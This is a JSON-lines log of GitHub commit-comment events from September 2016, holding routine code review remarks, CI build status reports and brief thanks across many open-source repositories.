{"id":"4506297728","type":"CommitCommentEvent","actor":{"login":"araykopotay"},"repo":{"name":"apple/swift"},"payload":{"comment":{"id":18874506,"position":16,"line":80,"path":"utils/update-checkout","commit_id":"fe9b7a967048a5b9a0f5e999833dd016b52414e3","created_at":"2016-09-02T02:50:35Z","updated_at":"2016-09-02T02:50:35Z","body":"+"}},"created_at":"2016-09-02T02:50:35Z"}
{"id":"4506298310","type":"CommitCommentEvent","actor":{"login":"jgrigonis"},"repo":{"name":"ansible/ansible-modules-core"},"payload":{"comment":{"id":18874507,"position":null,"line":null,"path":null,"commit_id":"5728ef89f0764be9066fc1bf0fbbf7785e60f4cb","created_at":"2016-09-02T02:50:50Z","updated_at":"2016-09-02T02:50:50Z","body":"I did, it's #4634 "}},"created_at":"2016-09-02T02:50:50Z"}
{"id":"4506300987","type":"CommitCommentEvent","actor":{"login":"NickataLin"},"repo":{"name":"NickataLin/Tutorial"},"payload":{"comment":{"id":18874510,"position":null,"line":null,"path":null,"commit_id":"912c318dade0dd0cbd2dcb7baa8d605e7cc4d406","created_at":"2016-09-02T02:52:00Z","updated_at":"2016-09-02T02:52:00Z","body":"uhhh"}},"created_at":"2016-09-02T02:52:00Z"}
{"id":"4506303945","type":"CommitCommentEvent","actor":{"login":"sbrossie"},"repo":{"name":"killbill/killbill-client-ruby"},"payload":{"comment":{"id":18874514,"position":7,"line":43,"path":"lib/killbill_client/models/overdue.rb","commit_id":"58d2c0f0075a1ca27235e2dd142ddce1c4e19f21","created_at":"2016-09-02T02:53:14Z","updated_at":"2016-09-02T02:53:14Z","body":"I can definitely share some of the code. Regarding naming, i can also use `update` instead of `modify` (netter indeed) but i might actually want to say `upload` since we could start from a no config situation (and also the call is implemented as a `POST`"}},"created_at":"2016-09-02T02:53:14Z"}
{"id":"4506305784","type":"CommitCommentEvent","actor":{"login":"fhe-odoo"},"repo":{"name":"odoo/odoo"},"payload":{"comment":{"id":18874516,"position":null,"line":null,"path":null,"commit_id":"0bedc14c124ef20a1d11b4c5c5fdc746bad02f14","created_at":"2016-09-02T02:54:00Z","updated_at":"2016-09-02T02:54:00Z","body":"Thank you dear Jesus! no more manual opps transfer notifications."}},"created_at":"2016-09-02T02:54:00Z"}
{"id":"4506314066","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":18874526,"position":null,"line":null,"path":null,"commit_id":"f23314f731e2ea997cab228d1a6c0408f2ea767f","created_at":"2016-09-02T02:57:25Z","updated_at":"2016-09-02T02:57:25Z","body":"We are going to try to use this to improve Clang and Visual C++ code generation. As it stands, Clang and VC++ performance is inferior to GCC and ICPC. Part of the reason is missed optimizations due to the compiler's inability to deduce a compile time constant (and its propagation). See, for example, [Issue 24226 - Constant not propagated into inline assembly, results in \"constraint 'I' expects an integer constant expression\"](http://llvm.org/bugs/show_bug.cgi?id=24226)."}},"created_at":"2016-09-02T02:57:25Z"}
{"id":"4506315111","type":"CommitCommentEvent","actor":{"login":"guestcenter-devops"},"repo":{"name":"opentable/gc-microsite-restaurant-search"},"payload":{"comment":{"id":18874527,"position":null,"line":null,"path":null,"commit_id":"834cc4d573b82acd4521eb54b251ade93916f55a","created_at":"2016-09-02T02:57:50Z","updated_at":"2016-09-02T02:57:50Z","body":"TeamCity Umami :: WebClient :: Sites :: Micro Sites :: GC Microsite - Restaurant Search :: Pull Request Test [Build 5](http://teamcity.otenv.com/viewLog.html?buildId=5155426&buildTypeId=Umami_WebClient_MicroSites_GcMicrositeRestaurantSearch_PullRequestTest) is now running\n"}},"created_at":"2016-09-02T02:57:50Z"}
{"id":"4506317244","type":"CommitCommentEvent","actor":{"login":"guestcenter-devops"},"repo":{"name":"opentable/gc-microsite-restaurant-search"},"payload":{"comment":{"id":18874531,"position":null,"line":null,"path":null,"commit_id":"834cc4d573b82acd4521eb54b251ade93916f55a","created_at":"2016-09-02T02:58:40Z","updated_at":"2016-09-02T02:58:40Z","body":"TeamCity Umami :: WebClient :: Sites :: Micro Sites :: GC Microsite - Restaurant Search :: Pull Request Test [Build 5](http://teamcity.otenv.com/viewLog.html?buildId=5155426&buildTypeId=Umami_WebClient_MicroSites_GcMicrositeRestaurantSearch_PullRequestTest) outcome was **FAILURE**\nSummary: Exit code 2 Build time: 00:00:50"}},"created_at":"2016-09-02T02:58:40Z"}
{"id":"4506319193","type":"CommitCommentEvent","actor":{"login":"guestcenter-devops"},"repo":{"name":"opentable/gc-microsite-restaurant-search"},"payload":{"comment":{"id":18874533,"position":null,"line":null,"path":null,"commit_id":"834cc4d573b82acd4521eb54b251ade93916f55a","created_at":"2016-09-02T02:59:26Z","updated_at":"2016-09-02T02:59:26Z","body":"TeamCity Umami :: WebClient :: Sites :: Micro Sites :: GC Microsite - Restaurant Search :: Pull Request Test [Build 6](http://teamcity.otenv.com/viewLog.html?buildId=5155427&buildTypeId=Umami_WebClient_MicroSites_GcMicrositeRestaurantSearch_PullRequestTest) is now running\n"}},"created_at":"2016-09-02T02:59:26Z"}
{"id":"4510429732","type":"CommitCommentEvent","actor":{"login":"oleksandrzelentsov"},"repo":{"name":"agatakaraskiewicz/magic-pencil"},"payload":{"comment":{"id":18885761,"position":41,"line":34,"path":"ball_pyramid.py","commit_id":"77c03184543c416bf614392c77659cec40969370","created_at":"2016-09-02T20:00:14Z","updated_at":"2016-09-02T20:00:14Z","body":"this technique is an anti-pattern ([Wiki page](https://en.wikipedia.org/wiki/Anti-pattern))\r\nand this particular one's name is `magic numbers`\r\n\r\n### problem:\r\n* you have a code which works the way you want it only with that numbers entered in it\r\n* if you wanna change those datapoints (vars) you should sneak into the code which can become complicated\r\n\r\n### solution:\r\n* use variables for such magic numbers"}},"created_at":"2016-09-02T20:00:14Z"}
{"id":"4510431606","type":"CommitCommentEvent","actor":{"login":"citibeth"},"repo":{"name":"citibeth/spack"},"payload":{"comment":{"id":18885764,"position":104,"line":1071,"path":"lib/spack/docs/spack_workflows.rst","commit_id":"1c66c2e29cd2ef1133b92907530744e04f216d20","created_at":"2016-09-02T20:00:37Z","updated_at":"2016-09-02T20:00:37Z","body":"Probably not worth the effort.  The patch would be an untrusted download,\nunless it comes with its own checksum.  See #1696\n\nOn Fri, Sep 2, 2016 at 8:47 AM, Axel Huebl <notifications@github.com> wrote:\n\n> would be cool if the patch() command could simply accept a link, too.\n>\n> e.g., patch(url='https://github.com/jswhit/pyproj/pull/54.patch',\n> when=...)\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/citibeth/spack/commit/1c66c2e29cd2ef1133b92907530744e04f216d20#commitcomment-18879720>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AB1cd3UESN1CKWIl4jwZGi1apva_FEgQks5qmBr-gaJpZM4Jzq9n>\n> .\n>\n"}},"created_at":"2016-09-02T20:00:37Z"}
{"id":"4510431782","type":"CommitCommentEvent","actor":{"login":"aekeus"},"repo":{"name":"brave/browser-laptop"},"payload":{"comment":{"id":18885765,"position":null,"line":null,"path":null,"commit_id":"f386c1c813f0bbdb9ae36d5c45a6f51e72b9f75d","created_at":"2016-09-02T20:00:40Z","updated_at":"2016-09-02T20:00:40Z","body":"++"}},"created_at":"2016-09-02T20:00:40Z"}
{"id":"4510432622","type":"CommitCommentEvent","actor":{"login":"catterbu"},"repo":{"name":"tanzirhasan/my-project"},"payload":{"comment":{"id":18885767,"position":null,"line":null,"path":null,"commit_id":"f3b9ab3305c721481ceebbe65895226423c3e6da","created_at":"2016-09-02T20:00:52Z","updated_at":"2016-09-02T20:00:52Z","body":"@tanzirhasan This commit message did not follow good conventions. You used past tense and placed the object first. The better version of this commit message might be:\r\n```\r\nAdd new observation\r\n```\r\nNearly identical content, but I changed the verb to present tense and moved it to the beginning. This occurred throughout your new commits. It is a minor thing, but important nonetheless. \r\nSee the section on writing good commit messages in the Git lab for more details."}},"created_at":"2016-09-02T20:00:52Z"}
{"id":"4510434763","type":"CommitCommentEvent","actor":{"login":"rizwanreza"},"repo":{"name":"taylorjacob1913/bloccit"},"payload":{"comment":{"id":18885770,"position":null,"line":null,"path":null,"commit_id":"f46d0d90d5f3b800d233c588fe24043bf5399d26","created_at":"2016-09-02T20:01:22Z","updated_at":"2016-09-02T20:01:22Z","body":"Good job on this."}},"created_at":"2016-09-02T20:01:22Z"}
{"id":"4510436377","type":"CommitCommentEvent","actor":{"login":"wholetthedogsout"},"repo":{"name":"FabMo/FabMo-Engine"},"payload":{"comment":{"id":18885778,"position":5,"line":48,"path":"package.json","commit_id":"78d78c6de82804788763867c7078eeeac7b9968c","created_at":"2016-09-02T20:01:45Z","updated_at":"2016-09-02T20:01:45Z","body":"(sorry took it out to run locally was breaking, putting back in)"}},"created_at":"2016-09-02T20:01:45Z"}
{"id":"4510436730","type":"CommitCommentEvent","actor":{"login":"jeremiegirault"},"repo":{"name":"snipsco/Postal"},"payload":{"comment":{"id":18885779,"position":null,"line":null,"path":null,"commit_id":"de0b72288c9de3c19feb13cea1cb616118920922","created_at":"2016-09-02T20:01:50Z","updated_at":"2016-09-02T20:01:50Z","body":"Thanks !"}},"created_at":"2016-09-02T20:01:50Z"}
{"id":"4510438655","type":"CommitCommentEvent","actor":{"login":"Joanmarie"},"repo":{"name":"w3c/aria"},"payload":{"comment":{"id":18885786,"position":null,"line":null,"path":null,"commit_id":"f1ef9f572459a2be1d54ebffa7348562cf1f40e1","created_at":"2016-09-02T20:02:18Z","updated_at":"2016-09-02T20:02:18Z","body":"Merged in commit d9617aac. Feel free to delete this branch if you have no other need for it."}},"created_at":"2016-09-02T20:02:18Z"}
{"id":"4510446707","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18885805,"position":null,"line":null,"path":null,"commit_id":"ccaa23bd7e04d9bc051eecd8a66d8a4fbb5297a6","created_at":"2016-09-02T20:04:15Z","updated_at":"2016-09-02T20:04:15Z","body":"AddLoggingToInstaller (JasonGlazer) - x86_64-MacOS-10.9-clang: OK (2326 of 2326 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ccaa23bd7e04d9bc051eecd8a66d8a4fbb5297a6-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ccaa23bd7e04d9bc051eecd8a66d8a4fbb5297a6-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-02T20:04:15Z"}
{"id":"4510447815","type":"CommitCommentEvent","actor":{"login":"irfanG"},"repo":{"name":"BelminSalkica/WIP-Zadace"},"payload":{"comment":{"id":18885807,"position":null,"line":null,"path":null,"commit_id":"8c3178b50ba36d25e4767d1e4fbbb2cd89da7594","created_at":"2016-09-02T20:04:30Z","updated_at":"2016-09-02T20:04:30Z","body":"hmm, meni se ucitava sasvim ok [\r\n<img width=\"306\" alt=\"screen shot 2016-09-02 at 22 02 43\" src=\"https://cloud.githubusercontent.com/assets/6802263/18216748/156b3394-7159-11e6-9b33-43be1a57b779.png\">\r\n](url)\r\n\r\nono sto ti fali je da ubacis navigationController (vidi sliku dole)\r\n<img width=\"553\" alt=\"screen shot 2016-09-02 at 22 01 34\" src=\"https://cloud.githubusercontent.com/assets/6802263/18216758/25f9a7ae-7159-11e6-8ec9-4e033e8d13e1.png\">\r\n\r\n+ da u nvaigationController dodas UIBarButtonItem i da napravis segue sa njega na detailsVC\r\n"}},"created_at":"2016-09-02T20:04:30Z"}
{"id":"4510449563","type":"CommitCommentEvent","actor":{"login":"seemethere"},"repo":{"name":"mdmedley/lizard"},"payload":{"comment":{"id":18885810,"position":6,"line":693,"path":"lizard.py","commit_id":"016d0ac2dbabf05e808165c6d8778dc922821097","created_at":"2016-09-02T20:04:56Z","updated_at":"2016-09-02T20:04:56Z","body":"Not a big fan of formats in formats but I can see why you did it"}},"created_at":"2016-09-02T20:04:56Z"}
{"id":"4510450385","type":"CommitCommentEvent","actor":{"login":"dezgeg"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":18885814,"position":null,"line":null,"path":null,"commit_id":"a6670c1a0b8cda8235296900cff950f39f60cf4f","created_at":"2016-09-02T20:05:08Z","updated_at":"2016-09-02T20:05:08Z","body":"@domenkozar  The `sudo` test in `tests.misc` is failing, could it be due to this change?\r\n\r\nhttp://hydra.nixos.org/build/39769273/nixlog/1/raw"}},"created_at":"2016-09-02T20:05:08Z"}
{"id":"4510451205","type":"CommitCommentEvent","actor":{"login":"kibertoad"},"repo":{"name":"philmander/browser-bunyan"},"payload":{"comment":{"id":18885816,"position":21,"line":17,"path":"README.md","commit_id":"f95165cc8364d93f6bf605048d1166783a7d2a40","created_at":"2016-09-02T20:05:20Z","updated_at":"2016-09-02T20:05:20Z","body":"Does this mean that /lib folder with bunyan.js is not needed for use?"}},"created_at":"2016-09-02T20:05:20Z"}
{"id":"4510451618","type":"CommitCommentEvent","actor":{"login":"RandomEtc"},"repo":{"name":"ebryn/ember-model"},"payload":{"comment":{"id":18885818,"position":null,"line":null,"path":null,"commit_id":"afcd09b7581007d8658aaa45ef849af31096481a","created_at":"2016-09-02T20:05:25Z","updated_at":"2016-09-02T20:05:25Z","body":"Travis fails here (as does testing locally) because `Ember.assign` isn't available in Ember 2.0.3. "}},"created_at":"2016-09-02T20:05:25Z"}
{"id":"4510451629","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18885819,"position":null,"line":null,"path":null,"commit_id":"811ba74ff6b19cfc8101a201b86a29e1e564f064","created_at":"2016-09-02T20:05:25Z","updated_at":"2016-09-02T20:05:25Z","body":"113835831-Source-Temp-Not-Reporting (RKStrand) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (1760 of 1761 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-811ba74ff6b19cfc8101a201b86a29e1e564f064-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-811ba74ff6b19cfc8101a201b86a29e1e564f064-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.94%25-yellow.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-811ba74ff6b19cfc8101a201b86a29e1e564f064-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-70.91%25-green.svg)</a>\n"}},"created_at":"2016-09-02T20:05:25Z"}
{"id":"4510453769","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18885823,"position":null,"line":null,"path":null,"commit_id":"811ba74ff6b19cfc8101a201b86a29e1e564f064","created_at":"2016-09-02T20:05:55Z","updated_at":"2016-09-02T20:05:55Z","body":"113835831-Source-Temp-Not-Reporting (RKStrand) - Win64-Windows-7-VisualStudio-12: OK (2332 of 2333 tests passed, 24 test warnings)\n\n * 25 tests had: AUD diffs.\n * 25 tests had: RDD diffs.\n * 15 tests had: ESO small diffs.\n * 13 tests had: MTR small diffs.\n * 4 tests had: EIO diffs.\n * 1 test had: ERR diffs.\n * 1 test had: ESO big diffs.\n * 1 test had: MTD diffs.\n * 1 test had: MTR big diffs.\n * 1 test had: Table big diffs.\n * 1 test had: Table small diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-811ba74ff6b19cfc8101a201b86a29e1e564f064-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-811ba74ff6b19cfc8101a201b86a29e1e564f064-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.96%25-yellow.svg)</a> \n"}},"created_at":"2016-09-02T20:05:55Z"}
{"id":"4510453906","type":"CommitCommentEvent","actor":{"login":"mgol"},"repo":{"name":"jquery/jquery"},"payload":{"comment":{"id":18885822,"position":76,"line":203,"path":"src/core.js","commit_id":"f519539d3b7a12b67adc3b2c63a19e3beca33a83","created_at":"2016-09-02T20:05:55Z","updated_at":"2016-09-02T20:05:55Z","body":"I agree the usefulness of this method is minuscule (and really out of scope for a DOM/AJAX library like jQuery) but it was added long ago when we didn't have a proper AMD module structure as we do now and since it's so extremely short it doesn't make much sense to remove it.\r\n\r\nIt can also still be useful so that apps needing a noop function use an already present one instead of creating them for every noop usage which might matter if you created lots of such functions."}},"created_at":"2016-09-02T20:05:55Z"}
{"id":"4510456936","type":"CommitCommentEvent","actor":{"login":"kibertoad"},"repo":{"name":"philmander/browser-bunyan"},"payload":{"comment":{"id":18885830,"position":29,"line":25,"path":"README.md","commit_id":"f95165cc8364d93f6bf605048d1166783a7d2a40","created_at":"2016-09-02T20:06:41Z","updated_at":"2016-09-02T20:06:41Z","body":"How would that work with the angular config instance, which doesn't have window object?"}},"created_at":"2016-09-02T20:06:41Z"}
{"id":"4510462205","type":"CommitCommentEvent","actor":{"login":"jvook"},"repo":{"name":"jvook/ng-torrent-ui"},"payload":{"comment":{"id":18885844,"position":null,"line":null,"path":null,"commit_id":"0607c30b185b4591f3296af1ab0597072de39162","created_at":"2016-09-02T20:08:01Z","updated_at":"2016-09-02T20:08:01Z","body":"Share ratio fixed to percentage not numeric ratio"}},"created_at":"2016-09-02T20:08:01Z"}
{"id":"4510462774","type":"CommitCommentEvent","actor":{"login":"docnick"},"repo":{"name":"graphiq-data/pdi-streamschemamerge-plugin"},"payload":{"comment":{"id":18885847,"position":35,"line":119,"path":"src/com/graphiq/kettle/steps/streamschemamerge/StreamSchemaStep.java","commit_id":"3c267b7a223061ba4f2231fe6196a77c92a8e623","created_at":"2016-09-02T20:08:11Z","updated_at":"2016-09-02T20:08:11Z","body":"If this method is called a lot, I'd suggest refactoring this for performance. We could read through the `infoStreams` list once and create a hashmap that links each step to its position. This way we don't have to iterate through all steps each time."}},"created_at":"2016-09-02T20:08:11Z"}
{"id":"4510467583","type":"CommitCommentEvent","actor":{"login":"meonkeys"},"repo":{"name":"csats/cachet-docker"},"payload":{"comment":{"id":18885857,"position":7,"line":23,"path":"Dockerfile","commit_id":"b1dd5e0ac0466eb22f47fa2869e2d50b06d785de","created_at":"2016-09-02T20:09:21Z","updated_at":"2016-09-02T20:09:21Z","body":"Fixed in 58f2561201d2cf6c71d96d17f1d3ba839a6386a4"}},"created_at":"2016-09-02T20:09:21Z"}
{"id":"4510474952","type":"CommitCommentEvent","actor":{"login":"TheLarkInn"},"repo":{"name":"AngularClass/angular2-webpack-starter"},"payload":{"comment":{"id":18885868,"position":5,"line":113,"path":"config/webpack.prod.js","commit_id":"fad28acfd89b63ea1b4e7534289ded99e3432448","created_at":"2016-09-02T20:11:14Z","updated_at":"2016-09-02T20:11:14Z","body":"we will be probably deprecating Dedupe for webpack 3ish timeline so best to leave out for ESM  "}},"created_at":"2016-09-02T20:11:14Z"}
{"id":"4510484264","type":"CommitCommentEvent","actor":{"login":"zijistark"},"repo":{"name":"EMFTeam/EMF"},"payload":{"comment":{"id":18885882,"position":72,"line":2084,"path":"EMF/common/cb_types/00_cb_types.txt","commit_id":"92d4217a6bfd60447cac4b9ae6fcf6df5d9620de","created_at":"2016-09-02T20:13:25Z","updated_at":"2016-09-02T20:13:25Z","body":"Did you decide that the attacker should take vassal opinion hit + claim generation for former pretenders/heirs? If so, that's fine w/ me. We might considering changing this CB to apply `subjugated` and `subjugated_other_rel` opinion modifiers to new vassals, though."}},"created_at":"2016-09-02T20:13:25Z"}
{"id":"4510494691","type":"CommitCommentEvent","actor":{"login":"zijistark"},"repo":{"name":"EMFTeam/EMF"},"payload":{"comment":{"id":18885911,"position":72,"line":2084,"path":"EMF/common/cb_types/00_cb_types.txt","commit_id":"92d4217a6bfd60447cac4b9ae6fcf6df5d9620de","created_at":"2016-09-02T20:15:57Z","updated_at":"2016-09-02T20:15:57Z","body":"Actually, regardless of whether `emf_no_law_penalties` happens for the succession law change (for the record, I prefer it as it is-- with proper penalty), I think it'd be a good idea in general if this CB properly applied those opinion modifiers."}},"created_at":"2016-09-02T20:15:57Z"}
{"id":"4510500517","type":"CommitCommentEvent","actor":{"login":"crunchyNYC"},"repo":{"name":"snicolet/Stockfish"},"payload":{"comment":{"id":18885923,"position":null,"line":null,"path":null,"commit_id":"ab3dde3206e22977c5828174ead814bcd4066d9e","created_at":"2016-09-02T20:17:20Z","updated_at":"2016-09-02T20:17:20Z","body":"What a wild ride.  Congrats!"}},"created_at":"2016-09-02T20:17:20Z"}
{"id":"4510510834","type":"CommitCommentEvent","actor":{"login":"docnick"},"repo":{"name":"graphiq-data/pdi-streamschemamerge-plugin"},"payload":{"comment":{"id":18885953,"position":99,"line":191,"path":"src/com/graphiq/kettle/steps/streamschemamerge/StreamSchemaStep.java","commit_id":"3c267b7a223061ba4f2231fe6196a77c92a8e623","created_at":"2016-09-02T20:19:49Z","updated_at":"2016-09-02T20:19:49Z","body":"What do you mean it \"can\" wind up removing the rowSet from the list of rowsets? "}},"created_at":"2016-09-02T20:19:49Z"}
{"id":"4510511072","type":"CommitCommentEvent","actor":{"login":"challarao"},"repo":{"name":"spring-projects/spring-boot"},"payload":{"comment":{"id":18885954,"position":null,"line":null,"path":null,"commit_id":"db83e89922c2ee7e3886175a875a06bc6faa5b86","created_at":"2016-09-02T20:19:50Z","updated_at":"2016-09-02T20:19:50Z","body":"How to enable in Spring Boot?"}},"created_at":"2016-09-02T20:19:50Z"}
{"id":"4510511320","type":"CommitCommentEvent","actor":{"login":"malahal"},"repo":{"name":"madhuthorat/nfs-ganesha"},"payload":{"comment":{"id":18885955,"position":28,"line":257,"path":"src/FSAL/FSAL_GPFS/export.c","commit_id":"05247766eb4590dbdcbb728b6e35304deda4bae0","created_at":"2016-09-02T20:19:56Z","updated_at":"2016-09-02T20:19:56Z","body":"You need to restore credentials after the call, I don't see it. \r\n"}},"created_at":"2016-09-02T20:19:56Z"}
{"id":"4510513629","type":"CommitCommentEvent","actor":{"login":"davidakachaos"},"repo":{"name":"PokemonGoF/PokemonGo-Bot"},"payload":{"comment":{"id":18885968,"position":null,"line":null,"path":null,"commit_id":"8edc2a8b5b0df8c6ba3f4865a046cda4b7d28356","created_at":"2016-09-02T20:20:28Z","updated_at":"2016-09-02T20:20:28Z","body":"@solderzzc Quick merge! I added the description in configuration_files.md as requested (on my fork) should I open a new PR for that?"}},"created_at":"2016-09-02T20:20:28Z"}
{"id":"4510516118","type":"CommitCommentEvent","actor":{"login":"yakovru"},"repo":{"name":"languagetool-org/languagetool"},"payload":{"comment":{"id":18885976,"position":null,"line":null,"path":null,"commit_id":"6d70ce1ba60793e392b76da6e5c04bd4a712531e","created_at":"2016-09-02T20:21:06Z","updated_at":"2016-09-02T20:21:06Z","body":"Category is not off by default.\r\nFirst rule \"Unknown_words\" is off by default because it use for spell checking with postag dictionary. "}},"created_at":"2016-09-02T20:21:06Z"}
{"id":"4510517357","type":"CommitCommentEvent","actor":{"login":"NightScap3"},"repo":{"name":"PokemonGoF/PokemonGo-Bot-Desktop"},"payload":{"comment":{"id":18885987,"position":null,"line":null,"path":null,"commit_id":"0b5becf7038e16430eb04b1753c5b5e38859ac35","created_at":"2016-09-02T20:21:23Z","updated_at":"2016-09-02T20:21:23Z","body":"doesnt help"}},"created_at":"2016-09-02T20:21:23Z"}
{"id":"4510518570","type":"CommitCommentEvent","actor":{"login":"SH-M"},"repo":{"name":"IAHM-COL/KingAir-350"},"payload":{"comment":{"id":18886001,"position":null,"line":null,"path":null,"commit_id":"d13e6ddeed75a28c00128d1782106672dd530870","created_at":"2016-09-02T20:21:41Z","updated_at":"2016-09-02T20:21:41Z","body":"I pushed the correct files now. Try it :sm"}},"created_at":"2016-09-02T20:21:41Z"}
{"id":"4510519822","type":"CommitCommentEvent","actor":{"login":"ElbertoOne"},"repo":{"name":"snicolet/Stockfish"},"payload":{"comment":{"id":18886033,"position":null,"line":null,"path":null,"commit_id":"ab3dde3206e22977c5828174ead814bcd4066d9e","created_at":"2016-09-02T20:22:00Z","updated_at":"2016-09-02T20:22:00Z","body":"Congrats!"}},"created_at":"2016-09-02T20:22:00Z"}
{"id":"4510520353","type":"CommitCommentEvent","actor":{"login":"ravwojdyla"},"repo":{"name":"spotify/ratatool"},"payload":{"comment":{"id":18886057,"position":28,"line":28,"path":"src/main/scala/com/spotify/ratatool/diffy/AvroDiffy.scala","commit_id":"ecdb790e738a8db7a56b8b3e60e88d64b695bbf9","created_at":"2016-09-02T20:22:09Z","updated_at":"2016-09-02T20:22:09Z","body":"what about schema evolution?"}},"created_at":"2016-09-02T20:22:09Z"}
{"id":"4510523083","type":"CommitCommentEvent","actor":{"login":"abienvenu"},"repo":{"name":"reinterpretcat/utymap"},"payload":{"comment":{"id":18886121,"position":null,"line":null,"path":null,"commit_id":"47314a5b182eddb8787d65334f393da73043c462","created_at":"2016-09-02T20:22:46Z","updated_at":"2016-09-02T20:22:46Z","body":"I just fixed the OSM data according to the Wiki (http://wiki.openstreetmap.org/wiki/Simple_3D_buildings), and now Utymap seems to be happy with it; Notre-Dame de Paris is beautiful :)\r\nIf you spot other rendering issues that may originate from an OSM data problem, feel free to pass it to me."}},"created_at":"2016-09-02T20:22:46Z"}
{"id":"4510523279","type":"CommitCommentEvent","actor":{"login":"nicholst"},"repo":{"name":"INCF/bidsutils"},"payload":{"comment":{"id":18886125,"position":null,"line":null,"path":null,"commit_id":"020d88fd5dc974f19284bb0bf426ec8ed60b715f","created_at":"2016-09-02T20:22:49Z","updated_at":"2016-09-02T20:22:49Z","body":"Thanks Chris!  This works for us here (is how we discovered the ds001 problem).  I'll let you know if there are any other changes."}},"created_at":"2016-09-02T20:22:49Z"}
{"id":"4510523573","type":"CommitCommentEvent","actor":{"login":"springmeyer"},"repo":{"name":"mapnik/node-mapnik"},"payload":{"comment":{"id":18886133,"position":null,"line":null,"path":null,"commit_id":"c88c84b468bdecdeb008cc39bad5870944ca43f8","created_at":"2016-09-02T20:22:53Z","updated_at":"2016-09-02T20:22:53Z","body":"This change to clipper was accidental. Landed as intended in 3f4a2c9f93487c"}},"created_at":"2016-09-02T20:22:53Z"}
{"id":"4510524793","type":"CommitCommentEvent","actor":{"login":"springmeyer"},"repo":{"name":"mapnik/node-mapnik"},"payload":{"comment":{"id":18886183,"position":null,"line":null,"path":null,"commit_id":"5709bfeb940b57bafa9a3ba0922af9b198875e2f","created_at":"2016-09-02T20:23:10Z","updated_at":"2016-09-02T20:23:10Z","body":"This change to clipper was accidental. Landed as intended in 3f4a2c9"}},"created_at":"2016-09-02T20:23:10Z"}
{"id":"4510526399","type":"CommitCommentEvent","actor":{"login":"malahal"},"repo":{"name":"madhuthorat/nfs-ganesha"},"payload":{"comment":{"id":18886230,"position":null,"line":null,"path":null,"commit_id":"05247766eb4590dbdcbb728b6e35304deda4bae0","created_at":"2016-09-02T20:23:32Z","updated_at":"2016-09-02T20:23:32Z","body":"You just need to restore creds. Otherwise, looks OK to me."}},"created_at":"2016-09-02T20:23:32Z"}
{"id":"4510529014","type":"CommitCommentEvent","actor":{"login":"alanhortz"},"repo":{"name":"resin-io-playground/resin-bbgw-bluetooth"},"payload":{"comment":{"id":18886319,"position":8,"line":8,"path":"start.sh","commit_id":"680738b121a235a395541d83c739f14d69fec6b4","created_at":"2016-09-02T20:24:11Z","updated_at":"2016-09-02T20:24:11Z","body":"Is it a type ? Shouldn't it be `ln -s firmware/TIInit_11.8.32.bts /lib/firmware/TIInit_11.8.32.bts`  ?"}},"created_at":"2016-09-02T20:24:11Z"}
{"id":"4510531306","type":"CommitCommentEvent","actor":{"login":"layus"},"repo":{"name":"layus/nixpkgs"},"payload":{"comment":{"id":18886365,"position":3,"line":3,"path":"pkgs/applications/science/programming/dafny/default.nix","commit_id":"1972c2703e42adf056badeae80ccb287ed623ebe","created_at":"2016-09-02T20:24:43Z","updated_at":"2016-09-02T20:24:43Z","body":"I am still unsure about the `outputFiles = [ \"*\" ];` part. This adds intermediate binaries into the package, as well as sources and such."}},"created_at":"2016-09-02T20:24:43Z"}
{"id":"4510534780","type":"CommitCommentEvent","actor":{"login":"nevillelyh"},"repo":{"name":"spotify/ratatool"},"payload":{"comment":{"id":18886389,"position":28,"line":28,"path":"src/main/scala/com/spotify/ratatool/diffy/AvroDiffy.scala","commit_id":"ecdb790e738a8db7a56b8b3e60e88d64b695bbf9","created_at":"2016-09-02T20:25:33Z","updated_at":"2016-09-02T20:25:33Z","body":"Not sure actually.\r\nIf I read 2 datasets of different schemas A & B with newer schema B as reader, will `GenericRecord`s of older A have the same schema as B?"}},"created_at":"2016-09-02T20:25:33Z"}
